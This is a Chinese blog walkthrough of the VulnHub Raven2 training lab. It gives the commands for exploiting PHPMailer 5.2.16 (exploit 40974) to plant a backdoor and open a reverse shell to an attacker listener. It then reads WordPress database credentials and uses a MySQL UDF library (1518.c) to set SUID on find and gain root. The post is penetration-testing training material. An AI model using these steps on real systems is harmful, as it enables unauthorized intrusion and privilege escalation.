raven2

最新推荐文章于 2024-04-24 18:00:25 发布
最新推荐文章于 2024-04-24 18:00:25 发布
阅读量715 收藏 4
点赞数 3
分类专栏: 靶机学习 文章标签: php 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45821131/article/details/125245345
版权

arp-scan -l

nmap -p- 192.168.19.145

发现文件夹vendor

访问此目录

在PATH路径下发现了flag1

在README.md文件中发现PHPMailer

在VERSION中发现版本5.2.16

寻找PHPMailer 5.2.16 的exp

search 40974

将exp文件拷贝到新建的raven2文件夹下

修改参数:

41行:改下地址:http://192.168.19.145/contact.php

42行:后门名称:/raven2.php

44行:改下回弹的IP和端口  192.168.19.147  6666

47行:改下写入shell的目录:/var/www/html/raven2.php

python3 40974.py

执行一下此py文件,然后访问路径

http://192.168.19.145/contact.php

此时已生成后门文件raven2.php文件

开启监听nc -vlp 6666

访问http://192.168.19.145/raven2.php

拿到shell

建立一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查找一下看有没有flag

find / -name flag*

发现两个flag

flag2

flag3

来到wordpress目录,然后进行枚举

grep "password" -rn wp-config.php

查看上下文,拿到用户名root 密码R@v3nSecurity 数据库名wordpress

连接数据库

mysql -uroot -pR@v3nSecurity

select version();  查看数据库版本

show databases;    查看数据库名

use wordpress      切换到wordpress数据库

show tables;       查看表名

select * from wp_users;  查看wp_users表中的所有内容

show global variables like 'secure%';

1)当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权

2)当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下,此时也无法提权

3)当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权!

打开一个新的窗口

searchsploit 1518.c

将文件拷贝下来

gcc -g -c 1518.c   ---GCC编译.o文件

gcc -g -shared -o raven2.so 1518.o -lc

-g 生成调试信息

-c 编译(二进制)

-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。

-o:执行命令后的文件名

-lc:-l 库 c库名

将文件传值靶机

回到数据库中,这次使用mysql数据库

创建表raven2,并把刚才上传的文件插入表中

raven2表成功插入二进制数据,然后利用dumpfile函数把文件导出,outfile 多行导出,dumpfile一行导出,outfile会有特殊的转换,而dumpfile是原数据导出!

新建存储函数:

select * from raven2 into dumpfile '/usr/lib/mysql/plugin/raven2.so';

创建自定义函数do_system,类型是integer,别名(soname)文件名字,然后查询函数是否创建成功:

create function do_system returns integer soname 'raven2.so';

查看以下创建的函数:

select * from mysql.func;

调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令:

select do_system('chmod u+s /usr/bin/find');

执行find命令

find / -exec "/bin/sh" \;

来到root目录下,拿到flag4.txt

无人问津的椰子
关注
专栏目录
【学渗透靶机——Raven2(mysql-udf提权)】
jieli0901227的博客
06-17 433
既然有数据库,还有之前有个wordpress 的blog ,那么查找一下数据库配置文件,浏览完页面没有发现什么, 发现blog 是个wordpress CMS,有个搜索,尝试注入,使用sqlmap 跑了一下,没跑成功;主机开放有22,80,111,39169端口 ,22端口没有收集到账号密码信息,那么暴力ssh 消耗时间成本太大,,优先80端口。nmap漏洞探测没有发现可利用的漏洞信息,只有网站的路径枚举信息,,我们留着,后面查看。查看一下wordpress 的版本,已经限制,不能查看版本。
raven2靶机渗透
my的博客
10-16 304
kaliraven靶机:链接:https://download.vulnhub.com/raven/Raven2.ova。
掠夺者2Raven2怎么下载 raven2游戏一键下载教程
最新发布
tjy888999的博客
04-24 477
同样在奇游中启用对《掠夺者2:Raven 2》的优化。在奇游中启用对《掠夺者2:Raven 2》的优化。点击游戏详细页面,你将看到一键下载的按钮,点击即可开始下载。下载完成后你就可以在游戏启动器中勾选同意服务协议,然后点击【PC版本预约注册】按钮进行预约注册了。备受瞩目的《掠夺者2:Raven 2》终于要来了。只需在奇游上查看《掠夺者2:Raven 2》并启用优化,即可确保游戏过程中网络连接稳定,告别卡顿和掉线。希望以上教程能够帮助到各位玩家,顺利下载并预约注册《掠夺者2:Raven 2》。
【oscp系列-Raven-2】靶机3
weixin_44807430的博客
01-16 217
知行合一
靶场练习第二十五天~vulnhub靶场之Raven-2
qq_57976347的博客
02-18 1039
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.128 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 访问靶机网站,
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
Raven:Javascript框架
05-05
掠夺Raven是一个创造性的编码框架,在Javascript环境中结合了在openFrameworks,Processing和Flash中看到的意识形态。 类按类型分开,因此可以轻松选择项目中需要框架的哪些部分。 虽然仍处于青春期,但正在进行重大...
Raven
10-25
2. **字形结构**:每个字母、数字和符号的形状和比例都是经过精心设计的,以确保在不同尺寸下都能保持良好的可读性。Raven字体可能有粗体、常规体、斜体等多种变体,以适应不同的设计需求。 3. **对比度与间距**:...
raven
03-07
通过键入以下命令来git clone https://github.com/icebox827/raven 在终端中运行bundle install 在终端中运行db:create以创建数据库在终端中运行db:migrate以迁移数据库rails s 开始添加用户并创建事件现场演示技术...
raven-django
06-09
免责声明:这项工作正在进行中,目的是让 Django 相关的东西脱离 raven 本身。 暂时不要用这个。 Raven-Django 是一个 Raven 扩展,它为框架提供完整的开箱即用支持。 Raven 本身是的 Python 客户端。 资源 IRC ...
Raven2
wswr的博客
10-12 688
renver2
3-VulnHub-Raven 2
尼德霍格007
07-08 344
VulnHub-Raven: 2 靶机地址:https://www.vulnhub.com/entry/raven-2,269/ 目标:找到四个flag.txt信息 作者:尼德霍格007 时间:2021-7-8 准备工作:kali虚拟机(NAT),raven2虚拟机(NAT) 一、信息收集 首先要确定目标机IP地址,nmap扫描 $ nmap -sP 192.168.21.0/24 之后查看开放端口,全端口扫描 可以看到目标机开放了22端口(SSH),80端口(HTTP)和两个其他端口(我不知道是干嘛
【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
人间体佐菲的博客
09-05 852
【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
Vulnhub: Raven 2 靶场渗透实战 Walkthrough By V.K.R(上)
weixin_52641450的博客
10-30 817
raven2 靶场 walkthrough by V.K.R
vulnhub之raven2
weixin_54431413的博客
07-01 501
phpmailer漏洞利用,需要根据实时情况修改exp,udf提权: 拷贝kali自带的链接库文件,创建表,将链接库文件写入到表中,造成表里dump到对应路径中,之后创造自定义函数,利用自定义函数执行操作系统命令,这个mysql属主是root,成功提权。...
Raven: 2(第三方漏洞getshell,linux数据库udf提权)
weixin_51423993的博客
01-20 3984
靶机下载地址 https://www.vulnhub.com/entry/raven-2,269/ -ls去掉?成功执行 不连接mysql的root就无权限发到那个目录
【VulnHub】Raven: 2靶机的渗透测试
大方子
06-28 4087
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
3-vulnhub Raven2实战
weixin_45345568的博客
06-17 517
3-vulnhub Raven2 下载地址为:https://download.vulnhub.com/raven/Raven2.ova 本次的靶机ip为192.168.3.14(桥接模式自动获取) 目标:拿到4个flag 一、信息搜集 1.扫描ip 2.扫描端口,这里使用nmap: nmap -p 1-65535 -sV 192.168.3.14 Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-06 23:06 CST Nmap scan repo
macos系统上打开VMware打开Raven2.ova是灰色的怎么回事
05-22
2. 确认您的系统是否支持Intel VT-x或AMD-V虚拟化技术。如果您的系统不支持虚拟化技术,则无法使用VMware软件。 3. 启用Intel VT-x或AMD-V虚拟化技术。您可以在计算机的BIOS设置中找到此选项。不同的计算机品牌和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值